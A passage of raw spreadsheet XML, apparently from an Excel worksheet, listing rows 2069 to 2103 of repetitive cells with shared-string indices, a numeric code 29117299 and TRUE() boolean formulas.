      <c r="C2069" t="s">
        <v>1</v>
      </c>
      <c r="D2069" t="s">
        <v>2385</v>
      </c>
      <c r="E2069" t="s">
        <v>1227</v>
      </c>
      <c r="F2069">
        <v>29117299</v>
      </c>
      <c r="G2069" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2069" t="s">
        <v>2408</v>
      </c>
      <c r="K2069">
        <v>0</v>
      </c>
      <c r="L2069" t="s">
        <v>98</v>
      </c>
      <c r="R2069" t="s">
        <v>5</v>
      </c>
      <c r="S2069" t="s">
        <v>1229</v>
      </c>
      <c r="T2069" t="s">
        <v>7</v>
      </c>
      <c r="U2069" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2070" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2070" s="1">
        <v>18438</v>
      </c>
      <c r="B2070" t="s">
        <v>0</v>
      </c>
      <c r="C2070" t="s">
        <v>78</v>
      </c>
      <c r="D2070" t="s">
        <v>2385</v>
      </c>
      <c r="E2070" t="s">
        <v>1227</v>
      </c>
      <c r="F2070">
        <v>29117299</v>
      </c>
      <c r="G2070" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2070" t="s">
        <v>2409</v>
      </c>
      <c r="K2070">
        <v>0</v>
      </c>
      <c r="L2070" t="s">
        <v>98</v>
      </c>
      <c r="R2070" t="s">
        <v>5</v>
      </c>
      <c r="S2070" t="s">
        <v>1229</v>
      </c>
      <c r="T2070" t="s">
        <v>7</v>
      </c>
      <c r="U2070" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2071" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2071" s="1">
        <v>18439</v>
      </c>
      <c r="B2071" t="s">
        <v>0</v>
      </c>
      <c r="C2071" t="s">
        <v>78</v>
      </c>
      <c r="D2071" t="s">
        <v>2385</v>
      </c>
      <c r="E2071" t="s">
        <v>1227</v>
      </c>
      <c r="F2071">
        <v>29117299</v>
      </c>
      <c r="G2071" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2071" t="s">
        <v>2410</v>
      </c>
      <c r="K2071">
        <v>0</v>
      </c>
      <c r="L2071" t="s">
        <v>98</v>
      </c>
      <c r="R2071" t="s">
        <v>5</v>
      </c>
      <c r="S2071" t="s">
        <v>1229</v>
      </c>
      <c r="T2071" t="s">
        <v>7</v>
      </c>
      <c r="U2071" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2072" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2072" s="1">
        <v>18440</v>
      </c>
      <c r="B2072" t="s">
        <v>0</v>
      </c>
      <c r="C2072" t="s">
        <v>78</v>
      </c>
      <c r="D2072" t="s">
        <v>2385</v>
      </c>
      <c r="E2072" t="s">
        <v>1227</v>
      </c>
      <c r="F2072">
        <v>29117299</v>
      </c>
      <c r="G2072" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2072" t="s">
        <v>2411</v>
      </c>
      <c r="K2072">
        <v>0</v>
      </c>
      <c r="L2072" t="s">
        <v>98</v>
      </c>
      <c r="R2072" t="s">
        <v>5</v>
      </c>
      <c r="S2072" t="s">
        <v>1229</v>
      </c>
      <c r="T2072" t="s">
        <v>7</v>
      </c>
      <c r="U2072" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2073" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2073" s="1">
        <v>18441</v>
      </c>
      <c r="B2073" t="s">
        <v>0</v>
      </c>
      <c r="C2073" t="s">
        <v>78</v>
      </c>
      <c r="D2073" t="s">
        <v>2385</v>
      </c>
      <c r="E2073" t="s">
        <v>1227</v>
      </c>
      <c r="F2073">
        <v>29117299</v>
      </c>
      <c r="G2073" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2073" t="s">
        <v>2412</v>
      </c>
      <c r="K2073">
        <v>0</v>
      </c>
      <c r="L2073" t="s">
        <v>98</v>
      </c>
      <c r="R2073" t="s">
        <v>5</v>
      </c>
      <c r="S2073" t="s">
        <v>1229</v>
      </c>
      <c r="T2073" t="s">
        <v>7</v>
      </c>
      <c r="U2073" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2074" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2074" s="1">
        <v>18442</v>
      </c>
      <c r="B2074" t="s">
        <v>0</v>
      </c>
      <c r="C2074" t="s">
        <v>78</v>
      </c>
      <c r="D2074" t="s">
        <v>2385</v>
      </c>
      <c r="E2074" t="s">
        <v>1227</v>
      </c>
      <c r="F2074">
        <v>29117299</v>
      </c>
      <c r="G2074" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2074" t="s">
        <v>2413</v>
      </c>
      <c r="K2074">
        <v>0</v>
      </c>
      <c r="L2074" t="s">
        <v>98</v>
      </c>
      <c r="R2074" t="s">
        <v>5</v>
      </c>
      <c r="S2074" t="s">
        <v>1229</v>
      </c>
      <c r="T2074" t="s">
        <v>7</v>
      </c>
      <c r="U2074" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2075" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2075" s="1">
        <v>18443</v>
      </c>
      <c r="B2075" t="s">
        <v>0</v>
      </c>
      <c r="C2075" t="s">
        <v>78</v>
      </c>
      <c r="D2075" t="s">
        <v>2385</v>
      </c>
      <c r="E2075" t="s">
        <v>1227</v>
      </c>
      <c r="F2075">
        <v>29117299</v>
      </c>
      <c r="G2075" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2075" t="s">
        <v>2414</v>
      </c>
      <c r="K2075">
        <v>0</v>
      </c>
      <c r="L2075" t="s">
        <v>98</v>
      </c>
      <c r="R2075" t="s">
        <v>5</v>
      </c>
      <c r="S2075" t="s">
        <v>1229</v>
      </c>
      <c r="T2075" t="s">
        <v>7</v>
      </c>
      <c r="U2075" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2076" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2076" s="1">
        <v>18444</v>
      </c>
      <c r="B2076" t="s">
        <v>0</v>
      </c>
      <c r="C2076" t="s">
        <v>78</v>
      </c>
      <c r="D2076" t="s">
        <v>2385</v>
      </c>
      <c r="E2076" t="s">
        <v>1227</v>
      </c>
      <c r="F2076">
        <v>29117299</v>
      </c>
      <c r="G2076" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2076" t="s">
        <v>2415</v>
      </c>
      <c r="K2076">
        <v>0</v>
      </c>
      <c r="L2076" t="s">
        <v>98</v>
      </c>
      <c r="R2076" t="s">
        <v>5</v>
      </c>
      <c r="S2076" t="s">
        <v>1229</v>
      </c>
      <c r="T2076" t="s">
        <v>7</v>
      </c>
      <c r="U2076" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2077" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2077" s="1">
        <v>18445</v>
      </c>
      <c r="B2077" t="s">
        <v>0</v>
      </c>
      <c r="C2077" t="s">
        <v>78</v>
      </c>
      <c r="D2077" t="s">
        <v>2385</v>
      </c>
      <c r="E2077" t="s">
        <v>1227</v>
      </c>
      <c r="F2077">
        <v>29117299</v>
      </c>
      <c r="G2077" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2077" t="s">
        <v>2416</v>
      </c>
      <c r="K2077">
        <v>0</v>
      </c>
      <c r="L2077" t="s">
        <v>98</v>
      </c>
      <c r="R2077" t="s">
        <v>5</v>
      </c>
      <c r="S2077" t="s">
        <v>1229</v>
      </c>
      <c r="T2077" t="s">
        <v>7</v>
      </c>
      <c r="U2077" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2078" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2078" s="1">
        <v>18446</v>
      </c>
      <c r="B2078" t="s">
        <v>0</v>
      </c>
      <c r="C2078" t="s">
        <v>1</v>
      </c>
      <c r="D2078" t="s">
        <v>2385</v>
      </c>
      <c r="E2078" t="s">
        <v>1227</v>
      </c>
      <c r="F2078">
        <v>29117299</v>
      </c>
      <c r="G2078" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2078" t="s">
        <v>2417</v>
      </c>
      <c r="K2078">
        <v>0</v>
      </c>
      <c r="L2078" t="s">
        <v>98</v>
      </c>
      <c r="R2078" t="s">
        <v>5</v>
      </c>
      <c r="S2078" t="s">
        <v>1229</v>
      </c>
      <c r="T2078" t="s">
        <v>7</v>
      </c>
      <c r="U2078" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2079" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2079" s="1">
        <v>18447</v>
      </c>
      <c r="B2079" t="s">
        <v>0</v>
      </c>
      <c r="C2079" t="s">
        <v>78</v>
      </c>
      <c r="D2079" t="s">
        <v>2385</v>
      </c>
      <c r="E2079" t="s">
        <v>1227</v>
      </c>
      <c r="F2079">
        <v>29117299</v>
      </c>
      <c r="G2079" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2079" t="s">
        <v>2418</v>
      </c>
      <c r="K2079">
        <v>0</v>
      </c>
      <c r="L2079" t="s">
        <v>98</v>
      </c>
      <c r="R2079" t="s">
        <v>5</v>
      </c>
      <c r="S2079" t="s">
        <v>1229</v>
      </c>
      <c r="T2079" t="s">
        <v>7</v>
      </c>
      <c r="U2079" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2080" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2080" s="1">
        <v>18448</v>
      </c>
      <c r="B2080" t="s">
        <v>0</v>
      </c>
      <c r="C2080" t="s">
        <v>78</v>
      </c>
      <c r="D2080" t="s">
        <v>2385</v>
      </c>
      <c r="E2080" t="s">
        <v>1227</v>
      </c>
      <c r="F2080">
        <v>29117299</v>
      </c>
      <c r="G2080" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2080" t="s">
        <v>2419</v>
      </c>
      <c r="K2080">
        <v>0</v>
      </c>
      <c r="L2080" t="s">
        <v>98</v>
      </c>
      <c r="R2080" t="s">
        <v>5</v>
      </c>
      <c r="S2080" t="s">
        <v>1229</v>
      </c>
      <c r="T2080" t="s">
        <v>7</v>
      </c>
      <c r="U2080" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2081" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2081" s="1">
        <v>18449</v>
      </c>
      <c r="B2081" t="s">
        <v>0</v>
      </c>
      <c r="C2081" t="s">
        <v>78</v>
      </c>
      <c r="D2081" t="s">
        <v>2385</v>
      </c>
      <c r="E2081" t="s">
        <v>1227</v>
      </c>
      <c r="F2081">
        <v>29117299</v>
      </c>
      <c r="G2081" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2081" t="s">
        <v>2420</v>
      </c>
      <c r="K2081">
        <v>0</v>
      </c>
      <c r="L2081" t="s">
        <v>98</v>
      </c>
      <c r="R2081" t="s">
        <v>5</v>
      </c>
      <c r="S2081" t="s">
        <v>1229</v>
      </c>
      <c r="T2081" t="s">
        <v>7</v>
      </c>
      <c r="U2081" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2082" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2082" s="1">
        <v>18450</v>
      </c>
      <c r="B2082" t="s">
        <v>0</v>
      </c>
      <c r="C2082" t="s">
        <v>78</v>
      </c>
      <c r="D2082" t="s">
        <v>2385</v>
      </c>
      <c r="E2082" t="s">
        <v>1227</v>
      </c>
      <c r="F2082">
        <v>29117299</v>
      </c>
      <c r="G2082" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2082" t="s">
        <v>2421</v>
      </c>
      <c r="K2082">
        <v>0</v>
      </c>
      <c r="L2082" t="s">
        <v>98</v>
      </c>
      <c r="R2082" t="s">
        <v>5</v>
      </c>
      <c r="S2082" t="s">
        <v>1229</v>
      </c>
      <c r="T2082" t="s">
        <v>7</v>
      </c>
      <c r="U2082" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2083" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2083" s="1">
        <v>18451</v>
      </c>
      <c r="B2083" t="s">
        <v>0</v>
      </c>
      <c r="C2083" t="s">
        <v>78</v>
      </c>
      <c r="D2083" t="s">
        <v>2385</v>
      </c>
      <c r="E2083" t="s">
        <v>1227</v>
      </c>
      <c r="F2083">
        <v>29117299</v>
      </c>
      <c r="G2083" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2083" t="s">
        <v>2422</v>
      </c>
      <c r="K2083">
        <v>0</v>
      </c>
      <c r="L2083" t="s">
        <v>98</v>
      </c>
      <c r="R2083" t="s">
        <v>5</v>
      </c>
      <c r="S2083" t="s">
        <v>1229</v>
      </c>
      <c r="T2083" t="s">
        <v>7</v>
      </c>
      <c r="U2083" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2084" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2084" s="1">
        <v>18452</v>
      </c>
      <c r="B2084" t="s">
        <v>0</v>
      </c>
      <c r="C2084" t="s">
        <v>78</v>
      </c>
      <c r="D2084" t="s">
        <v>2385</v>
      </c>
      <c r="E2084" t="s">
        <v>1227</v>
      </c>
      <c r="F2084">
        <v>29117299</v>
      </c>
      <c r="G2084" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2084" t="s">
        <v>2423</v>
      </c>
      <c r="K2084">
        <v>0</v>
      </c>
      <c r="L2084" t="s">
        <v>98</v>
      </c>
      <c r="R2084" t="s">
        <v>5</v>
      </c>
      <c r="S2084" t="s">
        <v>1229</v>
      </c>
      <c r="T2084" t="s">
        <v>7</v>
      </c>
      <c r="U2084" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2085" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2085" s="1">
        <v>18453</v>
      </c>
      <c r="B2085" t="s">
        <v>0</v>
      </c>
      <c r="C2085" t="s">
        <v>78</v>
      </c>
      <c r="D2085" t="s">
        <v>2385</v>
      </c>
      <c r="E2085" t="s">
        <v>1227</v>
      </c>
      <c r="F2085">
        <v>29117299</v>
      </c>
      <c r="G2085" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2085" t="s">
        <v>2424</v>
      </c>
      <c r="K2085">
        <v>0</v>
      </c>
      <c r="L2085" t="s">
        <v>98</v>
      </c>
      <c r="R2085" t="s">
        <v>5</v>
      </c>
      <c r="S2085" t="s">
        <v>1229</v>
      </c>
      <c r="T2085" t="s">
        <v>7</v>
      </c>
      <c r="U2085" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2086" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2086" s="1">
        <v>18454</v>
      </c>
      <c r="B2086" t="s">
        <v>0</v>
      </c>
      <c r="C2086" t="s">
        <v>78</v>
      </c>
      <c r="D2086" t="s">
        <v>2385</v>
      </c>
      <c r="E2086" t="s">
        <v>1227</v>
      </c>
      <c r="F2086">
        <v>29117299</v>
      </c>
      <c r="G2086" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2086" t="s">
        <v>2425</v>
      </c>
      <c r="K2086">
        <v>0</v>
      </c>
      <c r="L2086" t="s">
        <v>98</v>
      </c>
      <c r="R2086" t="s">
        <v>5</v>
      </c>
      <c r="S2086" t="s">
        <v>1229</v>
      </c>
      <c r="T2086" t="s">
        <v>7</v>
      </c>
      <c r="U2086" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2087" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2087" s="1">
        <v>18455</v>
      </c>
      <c r="B2087" t="s">
        <v>0</v>
      </c>
      <c r="C2087" t="s">
        <v>78</v>
      </c>
      <c r="D2087" t="s">
        <v>2385</v>
      </c>
      <c r="E2087" t="s">
        <v>1227</v>
      </c>
      <c r="F2087">
        <v>29117299</v>
      </c>
      <c r="G2087" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2087" t="s">
        <v>2426</v>
      </c>
      <c r="K2087">
        <v>0</v>
      </c>
      <c r="L2087" t="s">
        <v>98</v>
      </c>
      <c r="R2087" t="s">
        <v>5</v>
      </c>
      <c r="S2087" t="s">
        <v>1229</v>
      </c>
      <c r="T2087" t="s">
        <v>7</v>
      </c>
      <c r="U2087" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2088" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2088" s="1">
        <v>18456</v>
      </c>
      <c r="B2088" t="s">
        <v>0</v>
      </c>
      <c r="C2088" t="s">
        <v>78</v>
      </c>
      <c r="D2088" t="s">
        <v>2385</v>
      </c>
      <c r="E2088" t="s">
        <v>1227</v>
      </c>
      <c r="F2088">
        <v>29117299</v>
      </c>
      <c r="G2088" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2088" t="s">
        <v>2427</v>
      </c>
      <c r="K2088">
        <v>0</v>
      </c>
      <c r="L2088" t="s">
        <v>98</v>
      </c>
      <c r="R2088" t="s">
        <v>5</v>
      </c>
      <c r="S2088" t="s">
        <v>1229</v>
      </c>
      <c r="T2088" t="s">
        <v>7</v>
      </c>
      <c r="U2088" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2089" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2089" s="1">
        <v>18457</v>
      </c>
      <c r="B2089" t="s">
        <v>0</v>
      </c>
      <c r="C2089" t="s">
        <v>1</v>
      </c>
      <c r="D2089" t="s">
        <v>2385</v>
      </c>
      <c r="E2089" t="s">
        <v>1227</v>
      </c>
      <c r="F2089">
        <v>29117299</v>
      </c>
      <c r="G2089" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2089" t="s">
        <v>2428</v>
      </c>
      <c r="K2089">
        <v>0</v>
      </c>
      <c r="L2089" t="s">
        <v>98</v>
      </c>
      <c r="R2089" t="s">
        <v>5</v>
      </c>
      <c r="S2089" t="s">
        <v>1229</v>
      </c>
      <c r="T2089" t="s">
        <v>7</v>
      </c>
      <c r="U2089" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2090" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2090" s="1">
        <v>18458</v>
      </c>
      <c r="B2090" t="s">
        <v>0</v>
      </c>
      <c r="C2090" t="s">
        <v>78</v>
      </c>
      <c r="D2090" t="s">
        <v>2385</v>
      </c>
      <c r="E2090" t="s">
        <v>1227</v>
      </c>
      <c r="F2090">
        <v>29117299</v>
      </c>
      <c r="G2090" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2090" t="s">
        <v>2429</v>
      </c>
      <c r="K2090">
        <v>0</v>
      </c>
      <c r="L2090" t="s">
        <v>98</v>
      </c>
      <c r="R2090" t="s">
        <v>5</v>
      </c>
      <c r="S2090" t="s">
        <v>1229</v>
      </c>
      <c r="T2090" t="s">
        <v>7</v>
      </c>
      <c r="U2090" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2091" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2091" s="1">
        <v>18459</v>
      </c>
      <c r="B2091" t="s">
        <v>0</v>
      </c>
      <c r="C2091" t="s">
        <v>78</v>
      </c>
      <c r="D2091" t="s">
        <v>2385</v>
      </c>
      <c r="E2091" t="s">
        <v>1227</v>
      </c>
      <c r="F2091">
        <v>29117299</v>
      </c>
      <c r="G2091" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2091" t="s">
        <v>2430</v>
      </c>
      <c r="K2091">
        <v>0</v>
      </c>
      <c r="L2091" t="s">
        <v>98</v>
      </c>
      <c r="R2091" t="s">
        <v>5</v>
      </c>
      <c r="S2091" t="s">
        <v>1229</v>
      </c>
      <c r="T2091" t="s">
        <v>7</v>
      </c>
      <c r="U2091" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2092" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2092" s="1">
        <v>18460</v>
      </c>
      <c r="B2092" t="s">
        <v>0</v>
      </c>
      <c r="C2092" t="s">
        <v>78</v>
      </c>
      <c r="D2092" t="s">
        <v>2385</v>
      </c>
      <c r="E2092" t="s">
        <v>1227</v>
      </c>
      <c r="F2092">
        <v>29117299</v>
      </c>
      <c r="G2092" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2092" t="s">
        <v>2431</v>
      </c>
      <c r="K2092">
        <v>0</v>
      </c>
      <c r="L2092" t="s">
        <v>98</v>
      </c>
      <c r="R2092" t="s">
        <v>5</v>
      </c>
      <c r="S2092" t="s">
        <v>1229</v>
      </c>
      <c r="T2092" t="s">
        <v>7</v>
      </c>
      <c r="U2092" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2093" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2093" s="1">
        <v>18461</v>
      </c>
      <c r="B2093" t="s">
        <v>0</v>
      </c>
      <c r="C2093" t="s">
        <v>78</v>
      </c>
      <c r="D2093" t="s">
        <v>2385</v>
      </c>
      <c r="E2093" t="s">
        <v>1227</v>
      </c>
      <c r="F2093">
        <v>29117299</v>
      </c>
      <c r="G2093" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2093" t="s">
        <v>2432</v>
      </c>
      <c r="K2093">
        <v>0</v>
      </c>
      <c r="L2093" t="s">
        <v>98</v>
      </c>
      <c r="R2093" t="s">
        <v>5</v>
      </c>
      <c r="S2093" t="s">
        <v>1229</v>
      </c>
      <c r="T2093" t="s">
        <v>7</v>
      </c>
      <c r="U2093" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2094" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2094" s="1">
        <v>18462</v>
      </c>
      <c r="B2094" t="s">
        <v>0</v>
      </c>
      <c r="C2094" t="s">
        <v>78</v>
      </c>
      <c r="D2094" t="s">
        <v>2385</v>
      </c>
      <c r="E2094" t="s">
        <v>1227</v>
      </c>
      <c r="F2094">
        <v>29117299</v>
      </c>
      <c r="G2094" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2094" t="s">
        <v>2433</v>
      </c>
      <c r="K2094">
        <v>0</v>
      </c>
      <c r="L2094" t="s">
        <v>98</v>
      </c>
      <c r="R2094" t="s">
        <v>5</v>
      </c>
      <c r="S2094" t="s">
        <v>1229</v>
      </c>
      <c r="T2094" t="s">
        <v>7</v>
      </c>
      <c r="U2094" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2095" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2095" s="1">
        <v>18463</v>
      </c>
      <c r="B2095" t="s">
        <v>0</v>
      </c>
      <c r="C2095" t="s">
        <v>78</v>
      </c>
      <c r="D2095" t="s">
        <v>2385</v>
      </c>
      <c r="E2095" t="s">
        <v>1227</v>
      </c>
      <c r="F2095">
        <v>29117299</v>
      </c>
      <c r="G2095" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2095" t="s">
        <v>2434</v>
      </c>
      <c r="K2095">
        <v>0</v>
      </c>
      <c r="L2095" t="s">
        <v>98</v>
      </c>
      <c r="R2095" t="s">
        <v>5</v>
      </c>
      <c r="S2095" t="s">
        <v>1229</v>
      </c>
      <c r="T2095" t="s">
        <v>7</v>
      </c>
      <c r="U2095" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2096" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2096" s="1">
        <v>18464</v>
      </c>
      <c r="B2096" t="s">
        <v>0</v>
      </c>
      <c r="C2096" t="s">
        <v>78</v>
      </c>
      <c r="D2096" t="s">
        <v>2385</v>
      </c>
      <c r="E2096" t="s">
        <v>1227</v>
      </c>
      <c r="F2096">
        <v>29117299</v>
      </c>
      <c r="G2096" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2096" t="s">
        <v>2435</v>
      </c>
      <c r="K2096">
        <v>0</v>
      </c>
      <c r="L2096" t="s">
        <v>98</v>
      </c>
      <c r="R2096" t="s">
        <v>5</v>
      </c>
      <c r="S2096" t="s">
        <v>1229</v>
      </c>
      <c r="T2096" t="s">
        <v>7</v>
      </c>
      <c r="U2096" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2097" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2097" s="1">
        <v>18465</v>
      </c>
      <c r="B2097" t="s">
        <v>0</v>
      </c>
      <c r="C2097" t="s">
        <v>78</v>
      </c>
      <c r="D2097" t="s">
        <v>2385</v>
      </c>
      <c r="E2097" t="s">
        <v>1227</v>
      </c>
      <c r="F2097">
        <v>29117299</v>
      </c>
      <c r="G2097" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2097" t="s">
        <v>2436</v>
      </c>
      <c r="K2097">
        <v>0</v>
      </c>
      <c r="L2097" t="s">
        <v>98</v>
      </c>
      <c r="R2097" t="s">
        <v>5</v>
      </c>
      <c r="S2097" t="s">
        <v>1229</v>
      </c>
      <c r="T2097" t="s">
        <v>7</v>
      </c>
      <c r="U2097" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2098" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2098" s="1">
        <v>18466</v>
      </c>
      <c r="B2098" t="s">
        <v>0</v>
      </c>
      <c r="C2098" t="s">
        <v>78</v>
      </c>
      <c r="D2098" t="s">
        <v>2385</v>
      </c>
      <c r="E2098" t="s">
        <v>1227</v>
      </c>
      <c r="F2098">
        <v>29117299</v>
      </c>
      <c r="G2098" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2098" t="s">
        <v>2437</v>
      </c>
      <c r="K2098">
        <v>0</v>
      </c>
      <c r="L2098" t="s">
        <v>98</v>
      </c>
      <c r="R2098" t="s">
        <v>5</v>
      </c>
      <c r="S2098" t="s">
        <v>1229</v>
      </c>
      <c r="T2098" t="s">
        <v>7</v>
      </c>
      <c r="U2098" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2099" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2099" s="1">
        <v>18467</v>
      </c>
      <c r="B2099" t="s">
        <v>0</v>
      </c>
      <c r="C2099" t="s">
        <v>78</v>
      </c>
      <c r="D2099" t="s">
        <v>2385</v>
      </c>
      <c r="E2099" t="s">
        <v>1227</v>
      </c>
      <c r="F2099">
        <v>29117299</v>
      </c>
      <c r="G2099" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2099" t="s">
        <v>2438</v>
      </c>
      <c r="K2099">
        <v>0</v>
      </c>
      <c r="L2099" t="s">
        <v>98</v>
      </c>
      <c r="R2099" t="s">
        <v>5</v>
      </c>
      <c r="S2099" t="s">
        <v>1229</v>
      </c>
      <c r="T2099" t="s">
        <v>7</v>
      </c>
      <c r="U2099" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2100" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2100" s="1">
        <v>18468</v>
      </c>
      <c r="B2100" t="s">
        <v>0</v>
      </c>
      <c r="C2100" t="s">
        <v>78</v>
      </c>
      <c r="D2100" t="s">
        <v>2385</v>
      </c>
      <c r="E2100" t="s">
        <v>1227</v>
      </c>
      <c r="F2100">
        <v>29117299</v>
      </c>
      <c r="G2100" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2100" t="s">
        <v>2439</v>
      </c>
      <c r="K2100">
        <v>0</v>
      </c>
      <c r="L2100" t="s">
        <v>98</v>
      </c>
      <c r="R2100" t="s">
        <v>5</v>
      </c>
      <c r="S2100" t="s">
        <v>1229</v>
      </c>
      <c r="T2100" t="s">
        <v>7</v>
      </c>
      <c r="U2100" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2101" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2101" s="1">
        <v>18469</v>
      </c>
      <c r="B2101" t="s">
        <v>0</v>
      </c>
      <c r="C2101" t="s">
        <v>78</v>
      </c>
      <c r="D2101" t="s">
        <v>2385</v>
      </c>
      <c r="E2101" t="s">
        <v>1227</v>
      </c>
      <c r="F2101">
        <v>29117299</v>
      </c>
      <c r="G2101" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2101" t="s">
        <v>2440</v>
      </c>
      <c r="K2101">
        <v>0</v>
      </c>
      <c r="L2101" t="s">
        <v>98</v>
      </c>
      <c r="R2101" t="s">
        <v>5</v>
      </c>
      <c r="S2101" t="s">
        <v>1229</v>
      </c>
      <c r="T2101" t="s">
        <v>7</v>
      </c>
      <c r="U2101" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2102" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2102" s="1">
        <v>18470</v>
      </c>
      <c r="B2102" t="s">
        <v>0</v>
      </c>
      <c r="C2102" t="s">
        <v>78</v>
      </c>
      <c r="D2102" t="s">
        <v>2385</v>
      </c>
      <c r="E2102" t="s">
        <v>1227</v>
      </c>
      <c r="F2102">
        <v>29117299</v>
      </c>
      <c r="G2102" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J2102" t="s">
        <v>2441</v>
      </c>
      <c r="K2102">
        <v>0</v>
      </c>
      <c r="L2102" t="s">
        <v>98</v>
      </c>
      <c r="R2102" t="s">
        <v>5</v>
      </c>
      <c r="S2102" t="s">
        <v>1229</v>
      </c>
      <c r="T2102" t="s">
        <v>7</v>
      </c>
      <c r="U2102" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="2103" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A2103" s="1">
        <v>18471</v>
      </c>
      <c r="B2103" t="s">
        <v>0</v>
      </c>
      <c r="C2103" t="s">
        <v>78</v>
      </c>
